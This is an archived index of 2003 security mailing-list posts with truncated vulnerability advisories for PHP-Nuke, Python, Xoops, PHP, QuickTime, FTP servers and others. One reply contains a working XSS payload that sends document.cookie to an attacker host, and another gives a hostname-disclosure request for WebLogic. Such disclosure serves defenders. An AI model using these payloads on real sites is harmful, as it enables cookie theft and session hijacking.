|
|
Colapse all |
Post message
Re: PHP-Nuke block-Forums.php subject vulnerabilities 2003-04-01 Frog Man (leseulfrog hotmail com) I haven't tested but I don't think addslashes() is a good solution here. The same javascript can be executed without ' or ", like this : "> <name=a><input type=hidden name=u value=http://www.attacker.com/prova.php></form> <script>window.open(document.a.u.value+document.cookie)</scri [ more ] [ reply ] XSS in Python Documentation Server 2003-04-02 euronymous (just-a-user yandex ru) =:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::= topic: XSS in Python Documentation Server product: Python 2.2.2 and 2.3a2 for Win32 vendor: http://www.python.org risk: low date: 04/02/2k3 tested platform: Windows 98 Second Edition discovered by: euronymous /F0KP advisory urls: http://f0kp.iplus. [ more ] [ reply ] [SECURITY] [DSA 275-1] New lpr-ppd packages fix local root exploit 2003-04-02 joey infodrom org (Martin Schulze) Css in Xoops module glossary 1.3.x 2003-04-01 magistrat (magistrat blocus-zone com) Author: Magistrat Date: 30/03/2003 Object: XOOPS glossary Module Input Filtering Bug Allows Remote Users to Conduct Cross-Site Scripting Attacks Impact: Disclosure of authentication information, Execution of arbitrary code via network, Modification of user information, User access via netwo [ more ] [ reply ] BEA WebLogic internal hostname disclosure 2003-04-02 Michael Hendrickx (michael scanit be) Hi, During a penentration test, I discovered that the BEA Weblogic Server reveals it hostname (on windows machines NetBIOS name) while sending the following request: GET . HTTP/1.0\r\n\r\n On older systems (Weblogic 7.0), a simple "BLAH . BLAH\r\n\r\n" will do the same trick. BEA was contacte [ more ] [ reply ] re:3com RAS 1500 Remote vulnerabilities. 2003-04-01 Jan Kachlik (jkachlik isgroup com) Hi Piotr Chytla >Synopsis: 3com RAS 1500 Remote vulnerabilities. >Product: 3C433279A-US http://www.3com/ras1500 >Version: Firmware X2.0.10 > >URL: http://isec.pl/vulnerabilities/isec-0009-3com-ras.txt >Author: Piotr Chytla <pch (at) isec (dot) pl [email concealed]> >Date: February 27, 2003 > > I teste [ more ] [ reply ] Inaccurate Reports Concerning PHP Vulnerabilities 2003-04-02 mattmurphy (at) kc.rr (dot) com [email concealed] (mattmurphy kc rr com) @(#)Mordred Labs advisory - Integer overflow in PHP array_pad() function 2003-04-01 Sir Mordred (mordred s-mail com) //@(#) Mordred Security Labs advisory Release date: April 1, 2003 Name: Integer overflow in PHP array_pad() function Versions affected: all versions Risk: average Author: Sir Mordred (mordred (at) s-mail (dot) com [email concealed]) I. Description: PHP is a widely-used general-purpose scripting language that is especial [ more ] [ reply ] @(#)Mordred Labs advisory - Integer overflow in PHP str_repeat() function 2003-04-01 Sir Mordred (mordred s-mail com) //@(#) Mordred Security Labs advisory Release date: April 1, 2003 Name: Integer overflow in PHP str_repeat() function Versions affected: all versions Risk: average Author: Sir Mordred (mordred (at) s-mail (dot) com [email concealed]) I. Description: PHP is a widely-used general-purpose scripting language that is especia [ more ] [ reply ] [SCSA-015] Remote Denial of Service Vulnerability in PowerFTP 2003-04-01 Grégory Le Bras (gregory lebras security-corporation com) ====================================================================== Security Corporation Security Advisory [SCSA-015] Remote Denial of Service Vulnerability in PowerFTP ====================================================================== PROGRAM: PowerFTP HOMEPAGE: http://www.cooolso [ more ] [ reply ] iDEFENSE Security Advisory 03.31.03: Buffer Overflow in Windows QuickTime Player 2003-04-01 iDEFENSE Labs (labs idefense com) -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 iDEFENSE Security Advisory 03.31.03: http://www.idefense.com/advisory/03.31.03.txt Buffer Overflow in Windows QuickTime Player March 31, 2003 I. BACKGROUND QuickTime Player is a popular media player for both the Microsoft Windows and Apple Mac platfor [ more ] [ reply ] Immunix Secured OS 7+ samba update 2003-04-01 Immunix Security Team (security wirex com) ----------------------------------------------------------------------- Immunix Secured OS Security Advisory Packages updated: samba Affected products: ImmunixOS 6.2, 7.0, 7+ Bugs fixed: CAN-2003-0085 Date: Mon Mar 31 2003 Advisory ID: IMNX-2003-7+-003-01 Author: Seth Arnold <sarnold (at) wirex (dot) c [email concealed] [ more ] [ reply ] TYPSoft FTP Server 2003-03-31 subj (r2subj3ct dwclan org) ------------------------------------------------------------- Product : TYPSoft FTP Server Version : 1.03 OSystem : Windows Authors : TYPSoft WebSite : http://www.typsoft.com Problem : Create and Remove directories with anonymous access ------------------------------------------------------ [ more ] [ reply ] Sambar Server "Buffer OverFlow" Vulnerabilities 2003-03-31 Lorenzo Manuel Hernandez Garcia-Hierro (security lorenzohgh com) **** THE SAMBAR SERVER BUFFER OVERFLOW IN SYSUSER LOGIN SYSTEM ***** RISK ( by mine) : 7 (1/10) SYSTES AFFECTED: All Sambar Server systems with sysuser login included. VULNERABILITIES: 2 KNOWN ( can be more) DESCRIPTION: This vulnerability is caused because the form that the Sambar Server [ more ] [ reply ] Fwd: QuickTime 6.1 for Windows is available 2003-04-01 Bryan Blackburn (blb pobox com) ----- Forwarded message from Product Security <product-security (at) apple (dot) com [email concealed]> ----- Date: Mon, 31 Mar 2003 13:29:36 -0800 Subject: QuickTime 6.1 for Windows is available From: Product Security <product-security (at) apple (dot) com [email concealed]> To: <security-announce (at) lists.apple (dot) com [email concealed]> Message-ID: <BAADF340.A6%product-securit [ more ] [ reply ] BRS WebWeaver: full disclosure 2003-03-31 euronymous (just-a-user yandex ru) =:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::= topic: BRS WebWeaver: full disclosure product: BRS WebWeaver 1.03 vendor: http://www.brswebweaver.com risk: high date: 31/03/2k3 tested platform: Windows 98 Second Edition discovered by: euronymous /F0KP advisory urls: http://f0kp.iplus.ru/bz/019 [ more ] [ reply ] [RHSA-2003:084-01] Updated vsftpd packages re-enable tcp_wrappers support 2003-04-01 bugzilla redhat com Re: IRM 004: ActiveSync Version 3.5 Denial of Service Vulnerability 2003-04-01 panic hackerfactor com In-Reply-To: <1048263395.5125.3.camel@Cadmium> I tried the sample DoS code, and it seems to do more than a DoS. I was able to crash applications beyond ActiveSync. This seems to me to indicate a write-overflow that *may* be exploitable to execute arbitrary code remotely. My system: Windows 20 [ more ] [ reply ] Immunix Secured OS 7+ openssl update 2003-04-01 Immunix Security Team (security wirex com) ----------------------------------------------------------------------- Immunix Secured OS Security Advisory Packages updated: sendmail Affected products: ImmunixOS 6.2, 7.0, 7+ Bugs fixed: CAN-2003-0161 Date: Mon Mar 31 2003 Advisory ID: IMNX-2003-7+-002-01 Author: Seth Arnold <sarnold@wire [ more ] [ reply ] FreeBSD Security Advisory FreeBSD-SA-03:07.sendmail 2003-03-30 FreeBSD Security Advisories (security-advisories freebsd org) MiniPortal 2003-03-30 subj (r2subj3ct dwclan org) Product : MiniPortal SOHO Version : 1.3.3 OSystem : Windows Authors : Instant Servers Inc WebSite : http://www.instantservers.com Problem : Create and Remove directories with anonymous access Description: ------------ eng: ==== MiniPortal includes the following components: WEB Serve [ more ] [ reply ] |
|
Privacy Statement |
Application: Viewpoint Server
Vendor: DS Ltd
Language: Shell
OS: Unixes
Discovered: Ben Maynard
<bmaynard(at)voodoox(dot)net>
-------------------------------
Application Description:
Viewpoint server is a web application that allow users
[ more ] [ reply ]